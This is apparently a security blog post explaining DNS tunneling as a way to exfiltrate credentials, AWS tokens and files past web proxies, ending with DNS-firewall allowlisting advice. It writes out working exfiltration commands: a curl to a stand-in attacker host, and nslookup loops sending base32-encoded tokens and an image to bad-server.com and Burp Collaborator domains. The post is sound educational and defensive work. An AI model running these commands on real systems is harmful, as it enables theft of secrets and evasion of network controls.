Data Exfiltration via DNS Tunneling

If you've ever wondered whether your sensitive data is sufficiently protected against exfiltration, you might want to consider a trending attack technique known as DNS tunneling.


Data exfiltration is a concern whenever we handle very sensitive data: Personally Identifiable Information (PII) such as email addresses, mailing addresses, and mobile numbers, or, in a PCI-DSS environment, cardholder data such as credit card numbers, also known as Primary Account Numbers (PAN). As its name suggests, data exfiltration means copying or transferring data out of an environment to an unintended destination that a malicious user controls.

Data exfiltration is concerning for many reasons, but put simply, it is a behaviour often seen in malware, which can arrive disguised as dependencies and packages (such as our Node.js dependencies or Python packages), as described in this blog post by Snyk.

In essence, there is a real possibility that we end up installing a malicious dependency that, once installed, attempts to exfiltrate sensitive data. That data is not limited to PII: if the dependency detects that it is running in an AWS environment, it could also target IAM role credentials, which can subsequently be used to escalate privileges. As described in this article, malicious Python packages have been used to exfiltrate AWS credentials and environment variables, and we may be relying on such packages indirectly without knowing it.

In this post, we will discuss an interesting way in which a malicious actor makes use of DNS tunneling to exfiltrate data purely through the use of DNS queries.

DNS Tunneling

In a PCI-DSS environment we often employ the strictest of security rules, such as very restricted SSH access, or a proxy that allows web connections only over HTTPS and only to whitelisted domain names. These are good and effective security measures. However, we must not forget that web traffic is not the only traffic leaving the environment: other network traffic (specifically DNS in this context) is something a malicious actor can leverage as well. DNS tunneling is a stealthy but common method, especially for malware that needs to communicate back to its command-and-control (C2) server, as the B1txor20 Linux botnet did.

What is DNS Tunneling?

DNS tunneling, in short, refers to the idea of encoding and hiding data within DNS queries and responses. For example, if we had the data username=quentin&password=P@ssw0rd and wished to exfiltrate it, one simple way using a web request would be to run a curl command against our C2 server, such as:

$ curl "https://bad-server.com/?username=quentin&password=P@ssw0rd"

But that would not work in environments that sit behind a web proxy allowing web traffic only to whitelisted domains, which is presumably a common setup today.

Using DNS Tunneling to Exfiltrate

So how can one make use of the DNS protocol to exfiltrate such data? In short, the idea is simply to encode the sensitive data into a subdomain of the domain name that a malicious actor controls.

We assume the malicious actor has full control over a public server and a domain name, and can read every DNS query made for names under that domain. In other words, all a malicious actor really needs to do is:

  • Purchase a domain
  • Rent a server (an EC2 instance works)
  • Set up the server to run as the authoritative DNS server for the domain (hi BIND), and point the domain's NS records at it
  • Enable DNS query logging

(Yes, anyone could do this, and it's really cheap!)

So if the malicious actor controls bad-server.com, a malicious query could be crafted as encoded-data.bad-server.com. Encoding can come in many forms like base64/base32/base16/etc, but personally, I would go for base32. It is simple, and it encodes any piece of data into a string containing only the characters [A-Z2-7], all of which are valid in a domain name (apart from the trailing = padding, which has to be stripped). Domain names are also case-insensitive, so an encoding that relies on mixed case, like base64, is a poorer fit. So if I wanted to encode my payload username=quentin&password=P@ssw0rd, it would look something like this:

$ echo "username=quentin&password=P@ssw0rd" | base32

So what do we do with our base32-encoded payload? Well, we use it to make a subdomain like OVZWK4TOMFWWKPLROVSW45DJNYTHAYLTON3W64TEHVIEA43TO4YHEZAK.bad-server.com, and just like that, we have a valid domain name to query, which is our final payload! All that is left is to make the DNS request for it, which we can do with any DNS query tool such as dig or nslookup.
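The encoding step above can be sketched as a small shell function. This is only an illustration: make_query_name is a hypothetical helper name, GNU coreutils base32 is assumed (for the -w 0 flag), and bad-server.com is the placeholder domain from this post. Note that echo appends a newline to the payload, which is why the encoded string above ends in K; printf '%s' leaves the newline out.

```shell
#!/bin/sh
# Hypothetical helper: turn a short payload into a single-label DNS query name.
# Nothing is sent over the network; the name is only printed.
make_query_name() {
    payload=$1
    domain=$2
    # printf '%s' avoids the trailing newline that echo would add.
    # -w 0 disables line wrapping; tr strips the '=' padding characters.
    label=$(printf '%s' "$payload" | base32 -w 0 | tr -d '=')
    printf '%s.%s\n' "$label" "$domain"
}

make_query_name 'username=quentin&password=P@ssw0rd' 'bad-server.com'
# prints OVZWK4TOMFWWKPLROVSW45DJNYTHAYLTON3W64TEHVIEA43TO4YHEZA.bad-server.com
```

The printed name could then be passed to dig or nslookup in the same way as the hand-built one.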


For demonstration purposes, we will use Burp Collaborator, a feature of Burp Suite Pro that lets us view the DNS queries made against a domain name that Burp Collaborator provides. In this case, instead of bad-server.com, our controlled domain name is wrrdka0w59aszots2dlnvdrm6dc30s.oastify.com, which makes our final exfiltration payload:

$ nslookup OVZWK4TOMFWWKPLROVSW45DJNYTHAYLTON3W64TEHVIEA43TO4YHEZAK.wrrdka0w59aszots2dlnvdrm6dc30s.oastify.com


Great, we now have the encoded version of the exfiltrated data as seen from Burp Collaborator. All that’s left to do is decode it back to its original form to see the actual data!

username=quentin&password=P@ssw0rd
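The decoding step can be sketched as follows. The helper name b32_decode_label is hypothetical and GNU coreutils base32 is assumed. The function restores any = padding that was stripped before sending, and upper-cases the label first, since the case of a DNS name is not guaranteed to survive the trip through resolvers.

```shell
#!/bin/sh
# Hypothetical helper: restore '=' padding and decode a base32 label.
b32_decode_label() {
    # Normalise to upper case in case the name arrived with altered case.
    label=$(printf '%s' "$1" | tr 'a-z' 'A-Z')
    # Padded base32 text is always a multiple of 8 characters long.
    while [ $(( ${#label} % 8 )) -ne 0 ]; do
        label="${label}="
    done
    printf '%s' "$label" | base32 -d
}

b32_decode_label 'OVZWK4TOMFWWKPLROVSW45DJNYTHAYLTON3W64TEHVIEA43TO4YHEZAK'
# prints username=quentin&password=P@ssw0rd
```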

Getting Around Domain Name Length Limits

Domain names, of course, have limits on their length. Each element of a domain name between the dots (called a “label”) has a maximum length of 63 characters, and the full name is limited to 253 characters. If we want to create our payload as described above and keep it within a single label, the encoded data must be 63 characters or fewer.

If our encoded payload exceeds this 63-character limit, the result is an invalid domain name and the query won’t go through.
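To make the limit concrete, here is a rough sketch of the arithmetic. The function names are hypothetical. Base32 carries 5 bits per character, so a 63-character label holds at most 39 bytes of raw data once padding is stripped.

```shell
#!/bin/sh
# Hypothetical helpers illustrating the DNS length limits discussed above.

# True if the string fits in a single DNS label (1 to 63 characters).
fits_in_label() {
    [ "${#1}" -ge 1 ] && [ "${#1}" -le 63 ]
}

# True if the full dotted name is within the 253-character limit.
fits_in_name() {
    [ "${#1}" -le 253 ]
}

# Raw bytes that fit in one label: N base32 characters hold floor(N*5/8) bytes.
max_bytes_per_label() {
    echo $(( 63 * 5 / 8 ))
}

max_bytes_per_label   # prints 39
fits_in_label 'OVZWK4TOMFWWKPLROVSW45DJNYTHAYLTON3W64TEHVIEA43TO4YHEZAK' && echo "fits in one label"
```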

Well, good thing we are (generally) not limited in the number of DNS queries we can make. A very simple but effective workaround for the label length limit is to split our payload across separate DNS queries.

Now, let’s assume a longer piece of data. In this case, we use the example of a temporary AWS token that we’ve stored in a bash variable $token. Such a token is far longer than 63 characters.


When we base32-encode the token, notice that the output is wrapped into lines of at most 76 characters each, which is the default for the GNU base32 command. We also strip the trailing = padding with sed, since = is not a valid character in a domain name.


Knowing this pattern, one way we can automate this exfiltration would be to split each line into 2 chunks, the first chunk containing 63 characters and the second chunk containing the remaining characters. We then, for each chunk, make a DNS query using nslookup. An example one-liner script to automate the whole exfiltration could be something like this:

$ for i in $(echo "$token" | base32 | sed 's/=//g'); do nslookup "${i:0:63}.bad-server.com"; [ -n "${i:63}" ] && nslookup "${i:63}.bad-server.com"; done
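As an alternative sketch of the same chunking idea, the 76-column wrapping can be turned off and the encoded string cut directly into 63-character pieces with fold. The function name chunk_to_names is hypothetical, GNU coreutils base32 is assumed, and the names are only printed here rather than queried.

```shell
#!/bin/sh
# Hypothetical helper: read raw data on stdin and print one query name per
# 63-character chunk. Nothing is sent over the network.
chunk_to_names() {
    domain=$1
    # -w 0 gives one unwrapped base32 line; tr strips '=' padding;
    # fold cuts the line every 63 characters; awk appends the domain.
    base32 -w 0 | tr -d '=' | fold -w 63 | awk -v d="$domain" '{ print $0 "." d }'
}

# Stand-in data: 100 bytes of "0" in place of a real token.
printf '%0100d' 0 | chunk_to_names 'bad-server.com'
```

Each printed line is a name that could be handed to nslookup, one query per chunk.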

Great! Now all we have to do is join the base32-encoded chunks from the subdomains back together, decode the result and poof, we have our exfiltrated token!
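A minimal sketch of that reassembly step, assuming the logged query names are available one per line, in the order they were sent, in the form chunk.domain. The function name reassemble is hypothetical and GNU coreutils base32 is assumed.

```shell
#!/bin/sh
# Hypothetical helper: rebuild the original data from logged query names
# read on stdin (one per line, already in the order they were sent).
reassemble() {
    # Keep only the first label of each name, join the chunks, upper-case them.
    encoded=$(cut -d . -f 1 | tr -d '\n' | tr 'a-z' 'A-Z')
    # Restore the '=' padding that was stripped before sending.
    while [ $(( ${#encoded} % 8 )) -ne 0 ]; do
        encoded="${encoded}="
    done
    printf '%s' "$encoded" | base32 -d
}

printf '%s\n' \
    'OVZWK4TOMFWWKPLROVSW45DJNYTHAYLTON3W64TE.bad-server.com' \
    'HVIEA43TO4YHEZAK.bad-server.com' | reassemble
# prints username=quentin&password=P@ssw0rd
```

DNS gives no ordering guarantee, so if queries can arrive out of order, a sequence number would need to be carried in the name as well; that is left out of this sketch.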

The same concept can be applied across any kind of data, and this concept can even apply to files like images and PDFs as well, which leads us to the next subsection.

Exfiltrating files through DNS Tunneling

So far, this post has discussed how one can exfiltrate text data through a series of DNS queries by hiding chunks of the encoded payload in the subdomain being queried. How about binary files? Well, in theory, any kind of data that can be encoded into one or more valid subdomains can be exfiltrated. In other words, if we can find a way to convert a file into its base32 form, the exfiltration process is trivial.

This is where cat can come in handy. The cat command essentially reads files and writes them to standard output. It doesn’t matter that the output shows seemingly gibberish content, because at the end of the day our goal is to encode the data into its base32 form. By simply running cat file.jpeg | base32, we can essentially convert file.jpeg into its base32 form. For demonstration purposes, we will convert the image peepoded.jpg into its base32 form.




Great! We have shown a way to convert even an image file (and by extension, almost any sort of file) into its base32 form. From here on, sending the file through DNS queries is just a matter of running the same commands as described in the previous subsection and capturing the queries in Burp Collaborator:

$ for i in $(cat peepoded.jpg | base32); do nslookup "${i:0:63}.aesm8s7i08nnkmx3jh61drevcmic61.oastify.com"; [ -n "${i:63}" ] && nslookup "${i:63}.aesm8s7i08nnkmx3jh61drevcmic61.oastify.com"; done


All that is left is to join the exfiltrated chunks back into the full encoded string and decode it, and voila, we have our original image back!

$ echo "$image" | base32 -d > file.jpg
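The whole file round trip can be checked locally without sending any DNS queries. The sketch below is only an illustration under a few assumptions: it uses a throwaway file of random bytes in place of a real image, assumes GNU coreutils base32, and the file names are made up.

```shell
#!/bin/sh
# Local round-trip check on a throwaway binary file; no DNS queries are sent.
tmp=$(mktemp -d)
head -c 1001 /dev/urandom > "$tmp/original.bin"

# Sender side: encode, strip padding, cut into label-sized chunks.
base32 -w 0 "$tmp/original.bin" | tr -d '=' | fold -w 63 > "$tmp/chunks.txt"

# Receiver side: join the chunks, restore the padding, decode.
encoded=$(tr -d '\n' < "$tmp/chunks.txt")
while [ $(( ${#encoded} % 8 )) -ne 0 ]; do
    encoded="${encoded}="
done
printf '%s' "$encoded" | base32 -d > "$tmp/restored.bin"

# cmp exits with status 0 only if the two files are byte-for-byte identical.
cmp "$tmp/original.bin" "$tmp/restored.bin" && echo "files are identical"
# Remove the directory in $tmp once done.
```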

As a proof of concept, we make use of the exfiltrated data and use it to convert the image back into its original form:


DNS Tunneling Defense using DNS Firewall Rules

If you’re worried about data exfiltration via DNS tunneling and wondering how to defend against it, one option is DNS firewalling. A good example is AWS’s Route 53 Resolver DNS Firewall, in which you can configure whitelisting/blacklisting rules. One approach is to create a blacklist rule that denies all domains, then a whitelist rule that allows only the specified domains, and to give the whitelist rule a higher priority than the blacklist rule so that it is evaluated first (in Route 53’s DNS Firewall, that means a lower numeric priority value). Just be aware that with Route 53’s DNS Firewall, the domain names encountered during recursive resolution have to be whitelisted as well. For example, if you wish to whitelist console.aws.amazon.com, first perform an actual lookup with a tool like nslookup or dig to see the CNAME records it resolves through.
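One way to collect those names is to filter the output of dig +short, which lists each CNAME target followed by the final IP addresses. The helper below is a hypothetical sketch. So that it runs without network access, it is fed sample input: the hostnames are the ones from this post, and the IP address is a made-up documentation address.

```shell
#!/bin/sh
# Hypothetical helper: keep only the hostnames (CNAME targets) from
# `dig +short` output, dropping IPv4 addresses and trailing dots.
cname_targets() {
    grep -Ev '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | sed 's/\.$//'
}

# Real use would be:  dig +short console.aws.amazon.com | cname_targets
# Sample input standing in for the dig output:
printf '%s\n' \
    'lbr.us.console.amazonaws.com.' \
    'us-west-2.console.aws.amazon.com.' \
    'gr.console-geo.us-west-2.amazonaws.com.' \
    'aad44edbebc6c7a36.awsglobalaccelerator.com.' \
    '192.0.2.10' | cname_targets
```

CNAME chains for large services can change over time, so a list gathered this way may need to be refreshed.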


In addition to whitelisting console.aws.amazon.com, your DNS firewall may also require you to whitelist the names in the CNAME chain, which in this case would include lbr.us.console.amazonaws.com, us-west-2.console.aws.amazon.com, gr.console-geo.us-west-2.amazonaws.com, and aad44edbebc6c7a36.awsglobalaccelerator.com.
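The "allow the listed names first, deny everything else" logic can be modelled with a toy shell function. This is not Route 53 configuration syntax, only a sketch of the evaluation order. The names ALLOWLIST and evaluate_query are hypothetical, and the list entries are the domains from the example above.

```shell
#!/bin/sh
# Toy model of a DNS firewall: the allow rule is checked first, and anything
# that does not match exactly falls through to the deny-all rule.
ALLOWLIST='console.aws.amazon.com
lbr.us.console.amazonaws.com
us-west-2.console.aws.amazon.com
gr.console-geo.us-west-2.amazonaws.com
aad44edbebc6c7a36.awsglobalaccelerator.com'

evaluate_query() {
    # Normalise: lower-case the name and drop a trailing dot, if any.
    name=$(printf '%s' "$1" | tr 'A-Z' 'a-z' | sed 's/\.$//')
    # -F fixed string, -x whole-line match, -q quiet.
    if printf '%s\n' "$ALLOWLIST" | grep -Fxq "$name"; then
        echo ALLOW
    else
        echo BLOCK
    fi
}

evaluate_query 'console.aws.amazon.com'   # prints ALLOW
evaluate_query 'OVZWK4TOMFWWKPLROVSW45DJNYTHAYLTON3W64TEHVIEA43TO4YHEZAK.bad-server.com'   # prints BLOCK
```

Because a tunneling query uses a freshly generated subdomain of an attacker-controlled domain, it never matches an exact-name list like this and falls through to the deny rule.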

To wrap it all up like a burrito

In this post, we’ve discussed how a malicious actor can use DNS tunneling to exfiltrate sensitive data and files purely through DNS queries, bypassing web-level proxies altogether. We’ve also pointed to references showing that public packages, dependencies, and libraries containing malicious code do attempt data exfiltration, so these are very legitimate concerns.

Malware that performs this kind of exfiltration can arrive through malicious dependencies and packages that were installed unintentionally. Ultimately, defenses against DNS tunneling will probably revolve around domain name whitelisting at the DNS level, because filtering at the web level alone is not sufficient.